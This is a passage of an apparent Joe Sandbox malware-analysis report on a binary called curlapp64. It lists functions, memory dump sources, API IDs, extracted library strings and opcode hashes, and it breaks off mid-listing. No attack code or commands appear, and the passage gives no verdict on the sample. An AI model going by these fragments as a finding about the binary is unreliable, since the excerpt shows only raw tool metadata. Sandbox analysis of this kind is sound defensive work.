                                                                                                                                • Instruction Fuzzy Hash: 8E417936608B8186EB20CF65F8643AA73A4FB89759F540179EB8D82B98DF38C555CB00
                                                                                                                                Function 00007FF6CAC00E50 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 51COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InfoLocale
                                                                                                                                • String ID: ACP$OCP
                                                                                                                                • API String ID: 2299586839-711371036
                                                                                                                                • Opcode ID: 025e3f2041bf02e8063c12f52691db8c575edefdaf525a3261195542c091d8ee
                                                                                                                                • Instruction ID: a79f9a317b916fae7e20d0b7e93283611f78569678cd9fc3f031efd70e88aeb3
                                                                                                                                • Opcode Fuzzy Hash: 025e3f2041bf02e8063c12f52691db8c575edefdaf525a3261195542c091d8ee
                                                                                                                                • Instruction Fuzzy Hash: C8117FA1A186C382F754CF65B560A7A7370BF44786F045075EBEED3A95DF2CE8418740
                                                                                                                                Function 00007FF6CABFD2A8 Relevance: 7.8, APIs: 5, Instructions: 286COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2227656907-0
                                                                                                                                • Opcode ID: 68a04ae83e868d6e66915f6d89590e086c20c15618bdbac2767a789615aefac4
                                                                                                                                • Instruction ID: 839b64e09d578f1d9508119fa6d20fc1d23b7b345709c94b426e482575050a83
                                                                                                                                • Opcode Fuzzy Hash: 68a04ae83e868d6e66915f6d89590e086c20c15618bdbac2767a789615aefac4
                                                                                                                                • Instruction Fuzzy Hash: F3B1E32EB1869241EE609F25BD202B96350FB86BD9F485179EEDE87BD5DE3CE441C300
                                                                                                                                Function 00007FF6CABD8240 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 302COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                • String ID: $6$@
                                                                                                                                • API String ID: 3668304517-2405554532
                                                                                                                                • Opcode ID: cafaf49ce4991ddd5bb66c3a8ae44f50c4af8d24662297efd5b63517c1891540
                                                                                                                                • Instruction ID: 2c85ee997f1b2da159c2ce45bbf8891af0e81e564972156b851e902ec1b8dcd7
                                                                                                                                • Opcode Fuzzy Hash: cafaf49ce4991ddd5bb66c3a8ae44f50c4af8d24662297efd5b63517c1891540
                                                                                                                                • Instruction Fuzzy Hash: F4B13873B206A44AE704CF66D8652BC3BA1F389756F44826AEEEA977C5DE3CD100C750
                                                                                                                                Function 00007FF8BA247944 Relevance: 6.4, APIs: 1, Strings: 3, Instructions: 398COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495227485.00007FF8BA241000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495209271.00007FF8BA240000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495250453.00007FF8BA24F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495279165.00007FF8BA257000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8ba240000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $header crc mismatch$unknown header flags set
                                                                                                                                • API String ID: 0-1127688429
                                                                                                                                • Opcode ID: 83de305d40d586b13aa6c85dcc0d975829e5936a5db0c4d3bae066d29995b2a7
                                                                                                                                • Instruction ID: ed0e8fa8312e5a838d8aaf55014a1925ba0e4515573c3cfe0fa01991db42fbee
                                                                                                                                • Opcode Fuzzy Hash: 83de305d40d586b13aa6c85dcc0d975829e5936a5db0c4d3bae066d29995b2a7
                                                                                                                                • Instruction Fuzzy Hash: 07F16172A187D68BE7A58B19C088A3E7AA9FF44B84F0645B8DF5D47790CF38D940DB40
                                                                                                                                Function 00007FF6CABDC820 Relevance: 35.1, APIs: 10, Strings: 10, Instructions: 64COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Xinvalid_argumentstd::_
                                                                                                                                • String ID: Hash/sign modifier requires an arithmetic presentation type$Invalid presentation type for bool$Invalid presentation type for floating-point$Invalid presentation type for integer$Invalid presentation type for pointer$Invalid presentation type for string$Invalid presentation type for wchar_t$Invalid presentation type specifier$Invalid type specification.$Zero modifier requires an arithmetic or pointer presentation type
                                                                                                                                • API String ID: 909987262-1539746584
                                                                                                                                • Opcode ID: 573299431265efdd850d425cac7f6f74e29878a269e9f63eddfeedbd983a4db3
                                                                                                                                • Instruction ID: 9fd9aea3f29170356cf894672016033cc7dfa467abdeeecd40bcb6b67c8cd826
                                                                                                                                • Opcode Fuzzy Hash: 573299431265efdd850d425cac7f6f74e29878a269e9f63eddfeedbd983a4db3
                                                                                                                                • Instruction Fuzzy Hash: AA212F62E1D4468AEB05AF24F8F50F82770AFA3302F9545B1D6DEC3AA7DD2DA516C310
                                                                                                                                Function 00007FF6CABD1C10 Relevance: 35.1, APIs: 10, Strings: 10, Instructions: 56COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Xinvalid_argumentstd::_
                                                                                                                                • String ID: Hash/sign modifier requires an arithmetic presentation type$Invalid presentation type for bool$Invalid presentation type for char$Invalid presentation type for floating-point$Invalid presentation type for integer$Invalid presentation type for pointer$Invalid presentation type for string$Invalid presentation type specifier$Invalid type specification.$Zero modifier requires an arithmetic or pointer presentation type
                                                                                                                                • API String ID: 909987262-3157939077
                                                                                                                                • Opcode ID: b6f603e07c54b3e44ff84907a074fce9d505c7cef7bbcbdd899f8c035c6bee26
                                                                                                                                • Instruction ID: 38a6a18a397fc4f4604c913e209f41836bea7436201fb41fbfa62ff0cece49f2
                                                                                                                                • Opcode Fuzzy Hash: b6f603e07c54b3e44ff84907a074fce9d505c7cef7bbcbdd899f8c035c6bee26
                                                                                                                                • Instruction Fuzzy Hash: 5C112151D1D4468AEB059F24F8F90F82760AFA3342F9105B1D6EEC39AADD2DA515C710
                                                                                                                                Function 00007FF6CABD1010 Relevance: 28.3, APIs: 8, Strings: 8, Instructions: 282COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Xinvalid_argumentstd::_
                                                                                                                                • String ID: Format specifier requires numeric argument.$Format specifier requires numeric or pointer argument.$Invalid fill (too long).$Invalid format string.$Missing precision specifier.$Number is too big$Precision not allowed for this argument type.$invalid fill character '{'
                                                                                                                                • API String ID: 909987262-1289275417
                                                                                                                                • Opcode ID: 4ecfc1aeadaa9003144cd881bd739515368904f19df2c6ffd4d8165f49351257
                                                                                                                                • Instruction ID: 580f9b1f16b20efb6ace80c2e34515e7ab2de10db41c9d813798bd3e8c7ed7c7
                                                                                                                                • Opcode Fuzzy Hash: 4ecfc1aeadaa9003144cd881bd739515368904f19df2c6ffd4d8165f49351257
                                                                                                                                • Instruction Fuzzy Hash: 0DB1C562E0C6D645FA21CF15F4642BC2B91AB53B82F4980B5CADD837D9DE7CE482C310
                                                                                                                                Function 00007FF6CABDB2B0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 317COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Xinvalid_argumentstd::_
                                                                                                                                • String ID: Can not switch from automatic to manual indexing$Can not switch from manual to automatic indexing$Invalid format string.$Missing '}' in format string.$Number is too big$Unknown format specifier.$\printui.exe
                                                                                                                                • API String ID: 909987262-2793897354
                                                                                                                                • Opcode ID: f6c01c62c856ee2be7a03454592f55a0d395d35d3f4a1897c86b8231bee07cf6
                                                                                                                                • Instruction ID: adfdc7bac206cf763ce5cd831024352f77051fdf107338427946e192ca69539f
                                                                                                                                • Opcode Fuzzy Hash: f6c01c62c856ee2be7a03454592f55a0d395d35d3f4a1897c86b8231bee07cf6
                                                                                                                                • Instruction Fuzzy Hash: 61C1CF62F08A4685EB10DF65E4602BD33B1FB06B89F944672DB8E93799EF38E545C340
                                                                                                                                Function 00007FF6CABCCCF0 Relevance: 23.0, APIs: 7, Strings: 6, Instructions: 216COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Xinvalid_argumentstd::_
                                                                                                                                • String ID: Can not switch from automatic to manual indexing$Can not switch from manual to automatic indexing$Invalid format string.$Missing '}' in format string.$Number is too big$Unknown format specifier.
                                                                                                                                • API String ID: 909987262-3302395901
                                                                                                                                • Opcode ID: 0440b771705aa634b53f916a856052b374cef2cdcb0320de4155a09d44106426
                                                                                                                                • Instruction ID: d9b59bc52c19b4ed404a0dcd6546f7028a69a7f142372264df13dc25253f7750
                                                                                                                                • Opcode Fuzzy Hash: 0440b771705aa634b53f916a856052b374cef2cdcb0320de4155a09d44106426
                                                                                                                                • Instruction Fuzzy Hash: E791B122F0CA4689EB109F68E4707FC23B1AB2678DF444672DA9D93695DE3CE559C340
                                                                                                                                Function 00007FF6CABBC000 Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 391COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_destroy
                                                                                                                                • String ID: value
                                                                                                                                • API String ID: 1346393832-494360628
                                                                                                                                • Opcode ID: 0310b5d94356e1a0248a2bd8b34368017910e743543c174186e30fec618f3732
                                                                                                                                • Instruction ID: 1caf3c591ea6341cbcc4a3c7db6e8b6a4a38f801cc03050cb6f42de2c38cd502
                                                                                                                                • Opcode Fuzzy Hash: 0310b5d94356e1a0248a2bd8b34368017910e743543c174186e30fec618f3732
                                                                                                                                • Instruction Fuzzy Hash: C5F1A462E18B8145EB00DF75F4A12FD2761EB877A5F5053B1EA9D93ADADE2CE480C340
                                                                                                                                Function 00007FF8A930FA74 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 239stringCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00007FF8A934FB40: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8A934FB6A
                                                                                                                                  • Part of subcall function 00007FF8A934FB40: strtoll.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF8A934FBC9
                                                                                                                                  • Part of subcall function 00007FF8A934FB40: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8A934FBDF
                                                                                                                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8A930FB3F
                                                                                                                                • strchr.VCRUNTIME140 ref: 00007FF8A930FC78
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _errno$_strdupstrchrstrtoll
                                                                                                                                • String ID: %s cookie %s="%s" for domain %s, path %s, expire %lld$Added$FALSE$Replaced
                                                                                                                                • API String ID: 1600025112-636008438
                                                                                                                                • Opcode ID: 189e8362f836203c65e123d59349c3f8a65b2cdfc0a7a25edc9309de516808a4
                                                                                                                                • Instruction ID: 4fad96dd7cb5c4170082fcbbf0938f627ecdedc4639f4f47d52b9b6fee06cdcb
                                                                                                                                • Opcode Fuzzy Hash: 189e8362f836203c65e123d59349c3f8a65b2cdfc0a7a25edc9309de516808a4
                                                                                                                                • Instruction Fuzzy Hash: DDB15922A0EED2A6EBA5CF65955437D27B0EF487D8F086175CB4D83695EF2CE4A08300
                                                                                                                                Function 00007FF6CABDC560 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 196COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Xinvalid_argumentstd::_
                                                                                                                                • String ID: Format specifier requires numeric argument.$Format specifier requires numeric or pointer argument.$Invalid format string.$Missing precision specifier.$Number is too big$Precision not allowed for this argument type.
                                                                                                                                • API String ID: 909987262-255851600
                                                                                                                                • Opcode ID: 7338f14aa2b8dfdc9b787f0f1bed3670266d6db603b78cfa3b9079e8c3764772
                                                                                                                                • Instruction ID: 0cfb14d10be99b2272b4bae94d7af1ec917c8e5220e35020fd74f78c61849009
                                                                                                                                • Opcode Fuzzy Hash: 7338f14aa2b8dfdc9b787f0f1bed3670266d6db603b78cfa3b9079e8c3764772
                                                                                                                                • Instruction Fuzzy Hash: 5371B322E0D18645EE649F25E1606B827A0EB53B82F4880B2D7CD837DADF6CF5D1C350
                                                                                                                                Function 00007FF6CABE9EB8 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 411COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                • String ID: 0$0$0$0$0
                                                                                                                                • API String ID: 3215553584-4235325143
                                                                                                                                • Opcode ID: 4d461d4d9c64d6e66a0ba516f054edcf1e575eb74db0db9928d6c50a3596f0fd
                                                                                                                                • Instruction ID: 70d83c9fc13845e34effa37a04135f093e913e72649ac84d881861da065a3aee
                                                                                                                                • Opcode Fuzzy Hash: 4d461d4d9c64d6e66a0ba516f054edcf1e575eb74db0db9928d6c50a3596f0fd
                                                                                                                                • Instruction Fuzzy Hash: 45E1E53290D68A49F7518F14A4B02BD7B99EB53B43F5480FAC6DDC7382CE3DA8599381
                                                                                                                                Function 00007FF6CABD43E0 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 428COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~__invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskFacet_RegisterXinvalid_argument
                                                                                                                                • String ID: integral cannot be stored in char
                                                                                                                                • API String ID: 3363080787-960316848
                                                                                                                                • Opcode ID: d326fcb0b71cde1728c00bb70a5fec91d517ac7fc11d43fdbee93278b1298833
                                                                                                                                • Instruction ID: 078a5e46fd62fc6c0dd63212bc1798c5f5969564f006c8aa6f94e19b47d9567f
                                                                                                                                • Opcode Fuzzy Hash: d326fcb0b71cde1728c00bb70a5fec91d517ac7fc11d43fdbee93278b1298833
                                                                                                                                • Instruction Fuzzy Hash: B802CF22E18B8185EB10CF65F4602BDA7A0FB46799F5442B1EADE93B99DF3CD485C700
                                                                                                                                Function 00007FF6CABDEEB0 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 423COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~__invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskFacet_RegisterXinvalid_argument
                                                                                                                                • String ID: integral cannot be stored in wchar_t
                                                                                                                                • API String ID: 3363080787-1689078516
                                                                                                                                • Opcode ID: fb57e847a963c36a3cda755f35a7df29a17cddc41c5d7e92136bd2a57e193ef2
                                                                                                                                • Instruction ID: c0a62ab834baac8f820f72220928d2d1c370728b58d9f5eb289b4e60e88ee95b
                                                                                                                                • Opcode Fuzzy Hash: fb57e847a963c36a3cda755f35a7df29a17cddc41c5d7e92136bd2a57e193ef2
                                                                                                                                • Instruction Fuzzy Hash: 79028C22E1CA8185EB108F64F4602BD77A0FB86799F544276EADD87A99DF3CE581C700
                                                                                                                                Function 00007FF6CABBD010 Relevance: 17.8, APIs: 5, Strings: 5, Instructions: 331COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                • String ID: ; expected $; last read: '$syntax error $unexpected $while parsing
                                                                                                                                • API String ID: 3668304517-4239264347
                                                                                                                                • Opcode ID: a496131e1601ee1da4032f93157b180dc9060424fff5b47d4220b7b3c46e69df
                                                                                                                                • Instruction ID: 81622554815a13c1dc5d63649fc8b24f201eb0c96efaba9abb4dbcb0ab32f708
                                                                                                                                • Opcode Fuzzy Hash: a496131e1601ee1da4032f93157b180dc9060424fff5b47d4220b7b3c46e69df
                                                                                                                                • Instruction Fuzzy Hash: C7E1AE62F1465189FB009FA1F8A03ED2762BB467A9F4042B5DE6D5BAD9DF789484C300
                                                                                                                                Function 00007FF6CABDE640 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 123COMMON
